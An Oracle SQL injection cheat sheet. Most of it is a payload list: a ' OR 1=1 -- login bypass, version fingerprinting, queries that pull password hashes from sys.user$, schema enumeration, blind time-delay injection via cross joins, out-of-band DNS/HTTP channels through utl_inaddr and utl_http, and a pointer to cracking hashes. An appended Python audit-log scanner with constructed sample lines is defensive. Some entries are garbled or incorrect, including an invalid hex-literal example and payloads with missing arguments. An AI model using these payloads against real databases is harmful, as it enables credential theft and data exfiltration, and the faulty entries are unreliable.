Oracle

Default Databases

- SYSTEM (available in all versions)
- SYSAUX (available in all versions)
Comment out Query

The `--` sequence, as used in the example below, can be used to comment out the rest of the query after your injection:

Example:
- SELECT * FROM users WHERE username = '' OR 1=1 --' AND password = '';
Testing Version

- SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';
- SELECT banner FROM v$version WHERE banner LIKE 'TNS%';
- SELECT version FROM v$instance;

Notes:
- LIKE is case-sensitive in Oracle, so the pattern must match the banner's capitalisation ("Oracle ...", "TNS ...").
- Every SELECT statement in Oracle must have a FROM clause; `dual` is a dummy table that can be used when no real table is needed, as in the examples on this page.
Database Credentials

- SELECT username FROM all_users; (available in all versions)
- SELECT name, password FROM sys.user$; (privileged, <= 10g)
- SELECT name, spare4 FROM sys.user$; (privileged, <= 11g)
Database Names

Current Database

- SELECT name FROM v$database;
- SELECT instance_name FROM v$instance;
- SELECT global_name FROM global_name;
- SELECT SYS.database_name FROM dual;
User Databases

- SELECT DISTINCT owner FROM all_tables;
Server Hostname

- SELECT host_name FROM v$instance; (privileged)
- SELECT utl_inaddr.get_host_name FROM dual;
- SELECT utl_inaddr.get_host_name('10.0.0.1') FROM dual;
- SELECT utl_inaddr.get_host_address FROM dual;
Tables and Columns

Retrieving Tables

- SELECT table_name FROM all_tables;

Retrieving Columns

- SELECT column_name FROM all_tab_columns;

Find Columns from Table Name

- SELECT column_name FROM all_tab_columns WHERE table_name = 'Users';

Find Tables from Column Name

- SELECT table_name FROM all_tab_columns WHERE column_name = 'password';

Note: the data dictionary stores unquoted identifiers in upper case, so a table created as `users` is listed as `USERS`; match the case the object was created with.

Retrieving Multiple Tables at Once

- SELECT RTRIM(XMLAGG(XMLELEMENT(e, table_name || ',')).EXTRACT('//text()'), ',') FROM all_tables;
Avoiding the Use of Quotations

Unlike other RDBMS, Oracle allows table/column names to be encoded.

- SELECT 0x09120911091 FROM dual; (hex encoding)
- SELECT CHR(32)||CHR(92)||CHR(...) FROM dual; (CHR() function; the argument of the last CHR() call is missing from the source)
String Concatenation

- SELECT 'A'||'d'||'mi'||'n' FROM dual;
Conditional Statements

- SELECT CASE WHEN 1=1 THEN 'true' ELSE 'false' END FROM dual;
Timing

Time Delay

- SELECT utl_inaddr.get_host_address('non-existent-domain.com') FROM dual; (the delay comes from the DNS lookup timing out)

Heavy Time Delays

- AND (SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) > 0 AND <n> > ASCII(SUBSTR((SELECT username FROM all_users WHERE rownum = 1), 1, 1)); (`<n>` stands for the numeric comparison value, which is missing from the source; the five-way cross join of all_users is what makes the statement slow)
Privileges

- SELECT privilege FROM session_privs;
- SELECT grantee, granted_role FROM dba_role_privs; (privileged)
Out of Band Channeling

DNS Requests

- SELECT utl_http.request('http://localhost') FROM dual;
- SELECT utl_inaddr.get_host_address('localhost.com') FROM dual;
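The queries in this sheet are also what a defender should be looking for in database audit or application query logs. As an added example (not part of the original cheat sheet), the Python scanner below flags the Oracle-specific probes listed above (v$version/v$instance fingerprinting, sys.user$ reads, utl_inaddr/utl_http lookups, the all_users cross join and the `' OR 1=1 --` truncation); the `timestamp|db_user|sql_text` line layout and all log lines are constructed for the example and are not a real Oracle audit format.

```python
import re

# Added example, not from the original cheat sheet. Patterns come from the
# Oracle-specific probes listed above; the "timestamp|db_user|sql_text" log layout
# is constructed for this example and is not a real Oracle audit format.
SIGNATURES = {  # name: (severity, pattern searched case-insensitively in the SQL)
    "comment_truncation": ("high",   re.compile(r"'\s*or\s+1\s*=\s*1\s*--", re.I)),
    "credential_access":  ("high",   re.compile(r"\bsys\.user\$", re.I)),
    "oob_channel":        ("high",   re.compile(r"\butl_(?:inaddr|http)\s*\.", re.I)),
    "heavy_cross_join":   ("high",   re.compile(r"(?:\ball_users\s+\w+\s*,\s*){2,}", re.I)),
    "version_probe":      ("medium", re.compile(r"\bv\$(?:version|instance)\b", re.I)),
    "dictionary_read":    ("low",    re.compile(r"\ball_(?:users|tables|tab_columns)\b", re.I)),
}
SEVERITY_RANK = {"high": 0, "medium": 1, "low": 2}

def classify(sql: str) -> list:
    """Names of every signature matching one statement, most severe first."""
    hits = [name for name, (_, pat) in SIGNATURES.items() if pat.search(sql)]
    return sorted(hits, key=lambda n: (SEVERITY_RANK[SIGNATURES[n][0]], n))

def scan_log(log_text: str) -> list:
    """Report each logged statement that matches at least one signature."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        try:  # maxsplit=2 keeps '||' concatenation inside the SQL text intact
            timestamp, user, sql = line.split("|", 2)
        except ValueError:
            continue  # malformed line: skip it rather than abort the whole scan
        hits = classify(sql)
        if hits:
            findings.append({"line": lineno, "time": timestamp, "user": user,
                             "severity": SIGNATURES[hits[0]][0], "matches": hits})
    return findings

# Constructed sample log: two benign statements, then probes from the cheat sheet
# (hostname, users and schema names are made up).
SAMPLE_AUDIT_LOG = """\
2024-03-01T10:00:01Z|app_user|SELECT id, name FROM products WHERE id = :1
2024-03-01T10:00:02Z|app_user|SELECT first_name || ' ' || last_name FROM employees
2024-03-01T10:00:03Z|app_user|SELECT * FROM users WHERE username = '' OR 1=1 --' AND password = ''
2024-03-01T10:00:04Z|app_user|SELECT banner FROM v$version WHERE banner LIKE 'Oracle%'
2024-03-01T10:00:05Z|app_user|SELECT name, spare4 FROM sys.user$
2024-03-01T10:00:06Z|app_user|SELECT utl_inaddr.get_host_address('lookup.example.invalid') FROM dual
2024-03-01T10:00:07Z|app_user|SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5
2024-03-01T10:00:08Z|report|SELECT table_name FROM all_tables WHERE owner = 'SALES'
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_AUDIT_LOG):
        print(f"line {f['line']:>2} {f['severity']:<6} {f['user']:<9} {', '.join(f['matches'])}")
```

Data-dictionary reads from an application account are only a low-severity signal on their own (reporting code legitimately queries all_tables), which is why the cross-join and sys.user$ patterns are ranked above them.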
Password Cracking

A Metasploit module for John the Ripper (JTR) can be found here.